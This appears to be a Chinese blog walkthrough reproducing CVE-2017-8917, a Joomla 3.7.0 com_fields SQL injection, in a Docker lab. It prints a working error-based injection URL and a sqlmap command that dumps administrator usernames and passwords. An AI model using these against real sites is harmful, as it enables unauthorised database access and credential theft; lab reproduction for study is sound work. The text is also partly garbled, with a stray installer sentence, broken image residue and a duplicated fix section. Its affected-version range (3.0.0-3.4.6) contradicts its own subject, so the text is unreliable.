joomla3.7.0sql注入漏洞复现

漏洞名称

joomla_3.7.0sql注入漏洞cve-2017-8917

漏洞描述

信息填对后,会显示安装成功com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,漏洞本质是Joomla对session数据处理不当,成功利用该漏洞后攻击者可以在未授权的情况下进行SQL注入

漏洞评级

高危漏洞

影响版本

joomla 3.0.0-3.4.6

漏洞复现

这里使用3.7.0版本

使用vulhub和kali

docker pull medicean/vulapps:j_joomla_2   拉取镜像到本地
docker run -d -p 8000:80 medicean/vulapps:j_joomla_2 启动镜像环境

访问http:ip地址+端口号

joomla3.7.0sql注入漏洞复现_第1张图片

在这里插入图片描述

漏洞验证

在网站输入

http://192.168.135.143:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select user())),1) --+

在这里插入图片描述](https://img-blog.csdnimg.cn/490ae21b323d4768a74b45e576b31824.png)

可以看到通过报错注入看到了数据库用户名

深度利用

sqlmap获取 管理员账密

sqlmap -u  "http://192.168.135.143:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D "joomla" -T "#__users" -C "username,password" --dump

joomla3.7.0sql注入漏洞复现_第2张图片

* 指纹信息

修复建议

打补丁,

上设备,

升级组件

-1693398639570)]

* 指纹信息

修复建议

打补丁,

上设备,

升级组件

你可能感兴趣的:(sql)